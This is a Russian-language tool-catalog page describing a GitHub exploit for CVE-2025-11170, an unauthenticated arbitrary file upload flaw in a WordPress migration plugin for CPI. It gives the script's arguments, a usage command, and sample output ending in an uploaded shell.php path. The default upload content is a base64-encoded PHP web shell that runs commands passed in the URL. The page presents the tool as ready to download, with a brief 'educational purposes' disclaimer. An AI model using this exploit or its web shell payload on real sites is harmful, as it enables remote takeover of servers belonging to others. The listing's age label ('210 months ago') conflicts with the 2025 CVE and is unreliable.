Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/nxploited/cve-2025-11170
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-11170

CVE-2025-11170

Плагин для миграции WP для CPI <= 1.0.2 - Unauthenticated Arbitrary File Upload

Репозиторий
210 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-11170

WP移行専用プラグイン for CPI <= 1.0.2 - Неаутентифицированная произвольная загрузка файлов

🚀 WP移行専用プラグイン for CPI <= 1.0.2 - Неаутентифицированная произвольная загрузка файлов

📝 Описание

Плагин WP移行専用プラグイン for CPI для WordPress уязвим к произвольной загрузке файлов из-за отсутствия проверки типа файла в функции Cpiwm_Import_Controller::import во всех версиях до 1.0.2 включительно.
Это позволяет неаутентифицированным злоумышленникам загружать произвольные файлы на сервер уязвимого сайта, что потенциально может привести к удаленному выполнению кода.

🛡️ Детали уязвимости

  • CVE: CVE-2025-11170
  • CVSS Score: 9.8 (Critical)
  • Вектор атаки: Неаутентифицированная удаленная загрузка файлов

⚡ Информация о скрипте

  • Имя скрипта: CVE-2025-11170.py
  • Назначение: Автоматизированный эксплойт для загрузки оболочки/файла на уязвимый плагин миграции CPI для WordPress.
  • 🔧 Использование

    Аргументы

    АргументОписание
    -u, --urlБазовый URL цели (например, http://target.com/wordpress/). Скрипт автоматически добавляет wp-admin/admin-ajax.php.
    -f, --filenameИмя загружаемой оболочки или файла. По умолчанию: shell.php
    -d, --dataСодержимое файла в base64 (или в виде обычного текста). По умолчанию: PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
    -i, --indexЗначение поля index. По умолчанию: 0
    -H, --headersДополнительные HTTP-заголовки (формат: X-Key:Value;K2:Value2)
    -t, --timeoutТаймаут HTTP-запроса (сек). По умолчанию: 10
    --retriesКоличество повторных попыток. По умолчанию: 3
    --backoffКоэффициент задержки между повторными попытками (сек). По умолчанию: 0.7
    -v, --verboseУвеличение подробности вывода для отладки (повторяемый параметр)

    🚦 Описание методов

    • Nxploited_parse_args
      Парсит и проверяет входные аргументы. Гарантирует правильную структуру конечной точки, заголовков и кодировку данных.

    • Nxploited_logging
      Настраивает расширенное логирование и уровень подробности для детального или минимального вывода во время выполнения.

    • Nxploited_retry_session
      Инициализирует постоянную сессию с логикой повторных попыток и задержки для устойчивой связи.

    • Nxploited_build_payload
      Формирует параметры POST-запроса для эксплуатации.

    • Nxploited_send
      Выполняет фактический POST-запрос к уязвимой конечной точке и обрабатывает ответы/ошибки.

    • Nxploited_output_result
      Обрабатывает и форматирует ответ, отображая путь к оболочке в случае успеха или отладочную информацию в противном случае.


    💡 Пример использования

    root@kitploit:~
    python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"
    

    Пример вывода:

    root@kitploit:~
    Uploading shell...
    Processing response...
    [+] Upload successful!
    Shell path:
    http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
    Nxploited
    My GitHub: https://github.com/Nxploited
    

    🚨 Отказ от ответственности

    Этот скрипт предоставляется только для образовательных целей.
    Использование данного эксплойта против целей без соответствующего разрешения может быть незаконным.
    Автор НЕ несет ответственности за любое неправомерное использование, ущерб или юридические последствия.


    📢 Контакты

    GitHub: Nxploited
    Telegram: KNxploited


    Автор: Nxploited ( Khaled Alenazi )

    Скачать инструмент